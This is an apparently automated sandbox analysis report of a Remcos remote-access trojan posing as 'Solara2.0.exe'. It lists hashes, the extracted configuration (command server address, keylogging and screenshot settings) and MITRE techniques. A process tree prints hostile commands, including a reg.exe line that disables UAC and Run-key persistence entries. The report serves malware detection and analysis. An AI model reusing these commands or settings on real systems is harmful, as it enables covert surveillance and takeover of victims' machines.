remcos | 9ec9c4c81c67d6628d141981a7020bb7ded83b4c40ff693870cd98eaebf74912

Analysis

max time kernel
173s
max time network
184s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
17/09/2024, 21:44

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

Solara2.0.exe
Size

469KB
MD5

48f4a8f633bf5535811c23a81d8d8506
SHA1

c2a98525bfda82421cb8670db223b19acef31f23
SHA256

9ec9c4c81c67d6628d141981a7020bb7ded83b4c40ff693870cd98eaebf74912
SHA512

7903c322d886bcffc06a9310ba451b0f0eac53d2acedf45b544548ae3656ef477b5a03a86d54452d65461957df4c643082338119bdeb0f2303f528daf0642e29
SSDEEP

12288:Wmnk7iLJbpIpiRL6I2WhSKQ9ZsfZQSOn9:uiLJbpI7I2WhQqZ7O9

Score

10^/10

remcos remotehost discovery evasion persistence rat trojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

192.168.1.56:13970

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
Windows32.exe
copy_folder
Health
delete_file
true
hide_file
true
hide_keylog_file
true
install_flag
true
install_path
%WinDir%\System32
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
filer32
keylog_path
%WinDir%\System32
mouse_option
false
mutex
Rmc-36XJ31
screenshot_crypt
true
screenshot_flag
true
screenshot_folder
Screenshots
screenshot_path
%WinDir%\System32
screenshot_time
10
startup_value
WindowsHealth
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Adds policy Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	iexplore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\WindowsHealth = "\"C:\\Windows\\SysWOW64\\Health\\Windows32.exe\""	iexplore.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	Solara2.0.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\WindowsHealth = "\"C:\\Windows\\SysWOW64\\Health\\Windows32.exe\""	Solara2.0.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	Windows32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\WindowsHealth = "\"C:\\Windows\\SysWOW64\\Health\\Windows32.exe\""	Windows32.exe

Deletes itself 1 IoCs

pid	Process
2440	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
2944	Windows32.exe

Loads dropped DLL 2 IoCs

pid	Process
3020	cmd.exe
3020	cmd.exe

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsHealth = "\"C:\\Windows\\SysWOW64\\Health\\Windows32.exe\""	Windows32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsHealth = "\"C:\\Windows\\SysWOW64\\Health\\Windows32.exe\""	iexplore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsHealth = "\"C:\\Windows\\SysWOW64\\Health\\Windows32.exe\""	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsHealth = "\"C:\\Windows\\SysWOW64\\Health\\Windows32.exe\""	Solara2.0.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsHealth = "\"C:\\Windows\\SysWOW64\\Health\\Windows32.exe\""	Solara2.0.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsHealth = "\"C:\\Windows\\SysWOW64\\Health\\Windows32.exe\""	Windows32.exe

Drops file in System32 directory 6 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\Health\Windows32.exe	Solara2.0.exe
File opened for modification	C:\Windows\SysWOW64\Health\Windows32.exe	Solara2.0.exe
File opened for modification	C:\Windows\SysWOW64\Health	Solara2.0.exe
File created	C:\Windows\SysWOW64\Screenshots\time_20240917_214527.dat	iexplore.exe
File opened for modification	C:\Windows\SysWOW64\filer32\logs.dat	iexplore.exe
File created	C:\Windows\SysWOW64\filer32\logs.dat	iexplore.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2944 set thread context of 2108	2944	Windows32.exe	36
PID 2108 set thread context of 2772	2108	iexplore.exe	43

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 35 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	calc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	calc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Solara2.0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	calc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	calc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	calc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Windows32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	calc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	calc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	calc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	calc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	calc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	calc.exe

Delays execution with timeout.exe 64 IoCs

evasion

pid	Process
2544	timeout.exe
2412	timeout.exe
3056	timeout.exe
1708	timeout.exe
1128	timeout.exe
2512	timeout.exe
1452	timeout.exe
2432	timeout.exe
2272	timeout.exe
1044	timeout.exe
2600	timeout.exe
2372	timeout.exe
2272	timeout.exe
2768	timeout.exe
2536	timeout.exe
3064	timeout.exe
3020	timeout.exe
2432	timeout.exe
892	timeout.exe
2296	timeout.exe
1092	timeout.exe
1712	timeout.exe
388	timeout.exe
2516	timeout.exe
1500	timeout.exe
2448	timeout.exe
2144	timeout.exe
820	timeout.exe
2348	timeout.exe
2764	timeout.exe
876	timeout.exe
2292	timeout.exe
1808	timeout.exe
2856	timeout.exe
2632	timeout.exe
2492	timeout.exe
1724	timeout.exe
1980	timeout.exe
1192	timeout.exe
2088	timeout.exe
2740	timeout.exe
868	timeout.exe
1724	timeout.exe
2860	timeout.exe
2740	timeout.exe
1668	timeout.exe
2336	timeout.exe
1044	timeout.exe
2672	timeout.exe
1224	timeout.exe
892	timeout.exe
2904	timeout.exe
2828	timeout.exe
2280	timeout.exe
2732	timeout.exe
2556	timeout.exe
1852	timeout.exe
2088	timeout.exe
1964	timeout.exe
320	timeout.exe
2940	timeout.exe
840	timeout.exe
2120	timeout.exe
2868	timeout.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

T1112

pid	Process
3040	reg.exe
2752	reg.exe
1708	reg.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2108	iexplore.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
2944	Windows32.exe
2108	iexplore.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2108	iexplore.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
2108	iexplore.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2108	iexplore.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1032 wrote to memory of 2424	1032	Solara2.0.exe	28
PID 1032 wrote to memory of 2424	1032	Solara2.0.exe	28
PID 1032 wrote to memory of 2424	1032	Solara2.0.exe	28
PID 1032 wrote to memory of 2424	1032	Solara2.0.exe	28
PID 2424 wrote to memory of 1708	2424	cmd.exe	30
PID 2424 wrote to memory of 1708	2424	cmd.exe	30
PID 2424 wrote to memory of 1708	2424	cmd.exe	30
PID 2424 wrote to memory of 1708	2424	cmd.exe	30
PID 1032 wrote to memory of 2440	1032	Solara2.0.exe	31
PID 1032 wrote to memory of 2440	1032	Solara2.0.exe	31
PID 1032 wrote to memory of 2440	1032	Solara2.0.exe	31
PID 1032 wrote to memory of 2440	1032	Solara2.0.exe	31
PID 2440 wrote to memory of 3020	2440	WScript.exe	32
PID 2440 wrote to memory of 3020	2440	WScript.exe	32
PID 2440 wrote to memory of 3020	2440	WScript.exe	32
PID 2440 wrote to memory of 3020	2440	WScript.exe	32
PID 3020 wrote to memory of 2944	3020	cmd.exe	34
PID 3020 wrote to memory of 2944	3020	cmd.exe	34
PID 3020 wrote to memory of 2944	3020	cmd.exe	34
PID 3020 wrote to memory of 2944	3020	cmd.exe	34
PID 2944 wrote to memory of 2060	2944	Windows32.exe	35
PID 2944 wrote to memory of 2060	2944	Windows32.exe	35
PID 2944 wrote to memory of 2060	2944	Windows32.exe	35
PID 2944 wrote to memory of 2060	2944	Windows32.exe	35
PID 2944 wrote to memory of 2108	2944	Windows32.exe	36
PID 2944 wrote to memory of 2108	2944	Windows32.exe	36
PID 2944 wrote to memory of 2108	2944	Windows32.exe	36
PID 2944 wrote to memory of 2108	2944	Windows32.exe	36
PID 2944 wrote to memory of 2108	2944	Windows32.exe	36
PID 2108 wrote to memory of 296	2108	iexplore.exe	38
PID 2108 wrote to memory of 296	2108	iexplore.exe	38
PID 2108 wrote to memory of 296	2108	iexplore.exe	38
PID 2108 wrote to memory of 296	2108	iexplore.exe	38
PID 2060 wrote to memory of 3040	2060	cmd.exe	40
PID 2060 wrote to memory of 3040	2060	cmd.exe	40
PID 2060 wrote to memory of 3040	2060	cmd.exe	40
PID 2060 wrote to memory of 3040	2060	cmd.exe	40
PID 296 wrote to memory of 2752	296	cmd.exe	42
PID 296 wrote to memory of 2752	296	cmd.exe	42
PID 296 wrote to memory of 2752	296	cmd.exe	42
PID 296 wrote to memory of 2752	296	cmd.exe	42
PID 2108 wrote to memory of 2772	2108	iexplore.exe	43
PID 2108 wrote to memory of 2772	2108	iexplore.exe	43
PID 2108 wrote to memory of 2772	2108	iexplore.exe	43
PID 2108 wrote to memory of 2772	2108	iexplore.exe	43
PID 2108 wrote to memory of 2772	2108	iexplore.exe	43
PID 2108 wrote to memory of 664	2108	iexplore.exe	47
PID 2108 wrote to memory of 664	2108	iexplore.exe	47
PID 2108 wrote to memory of 664	2108	iexplore.exe	47
PID 2108 wrote to memory of 664	2108	iexplore.exe	47
PID 2108 wrote to memory of 3024	2108	iexplore.exe	48
PID 2108 wrote to memory of 3024	2108	iexplore.exe	48
PID 2108 wrote to memory of 3024	2108	iexplore.exe	48
PID 2108 wrote to memory of 3024	2108	iexplore.exe	48
PID 664 wrote to memory of 2204	664	cmd.exe	51
PID 664 wrote to memory of 2204	664	cmd.exe	51
PID 664 wrote to memory of 2204	664	cmd.exe	51
PID 664 wrote to memory of 2204	664	cmd.exe	51
PID 664 wrote to memory of 388	664	cmd.exe	52
PID 664 wrote to memory of 388	664	cmd.exe	52
PID 664 wrote to memory of 388	664	cmd.exe	52
PID 664 wrote to memory of 388	664	cmd.exe	52
PID 664 wrote to memory of 1608	664	cmd.exe	53
PID 664 wrote to memory of 1608	664	cmd.exe	53

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1720	attrib.exe
2272	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Solara2.0.exe
"C:\Users\Admin\AppData\Local\Temp\Solara2.0.exe"
1⤵
- Adds policy Run key to start application
- Adds Run key to start application
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1032
- C:\Windows\SysWOW64\cmd.exe
  /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2424
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:1708
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
  2⤵
  - Deletes itself
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2440
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c "C:\Windows\SysWOW64\Health\Windows32.exe"
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3020
  - - C:\Windows\SysWOW64\Health\Windows32.exe
      C:\Windows\SysWOW64\Health\Windows32.exe
      4⤵
      Adds policy Run key to start application
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: MapViewOfSection
      Suspicious use of WriteProcessMemory
      PID:2944
    - - C:\Windows\SysWOW64\cmd.exe
        
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2060
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        6⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:3040
    - - \??\c:\program files (x86)\internet explorer\iexplore.exe
        
        "c:\program files (x86)\internet explorer\iexplore.exe"
        5⤵
        Adds policy Run key to start application
        Adds Run key to start application
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious behavior: MapViewOfSection
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2108
      - C:\Windows\SysWOW64\cmd.exe
        
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:296
        
        C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        7⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:2752
      - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        6⤵
        
        PID:2772
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\$Recycle.Bin\cpuu.bat" "
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:664
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2204
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:388
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1608
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1728
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2428
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2432
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2052
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2420
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2412
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2260
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2780
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2444
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2952
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3000
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2944
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2296
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2212
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2688
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2764
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2648
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3044
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2828
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2668
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:2512
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2496
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2560
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2972
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2072
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1796
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2044
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1444
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:1452
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2312
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2468
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2292
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1952
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1984
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2028
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1640
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2084
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1492
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:3008
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2548
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2584
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:820
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2796
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2732
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:952
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:936
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2564
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1980
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1324
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2836
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1764
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2856
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:2860
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2320
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2196
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1852
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2808
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2844
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1532
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1800
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:2672
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1092
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1696
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1128
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2256
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:604
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1664
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:868
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1388
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:3064
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2176
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1096
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1828
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:940
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2744
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1148
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2344
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1192
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1556
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1780
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1712
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2208
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:832
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:912
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:920
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:792
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1256
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1548
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:320
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2328
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:2348
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2384
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2356
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:568
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1648
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2056
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:760
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:3068
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:892
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:900
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
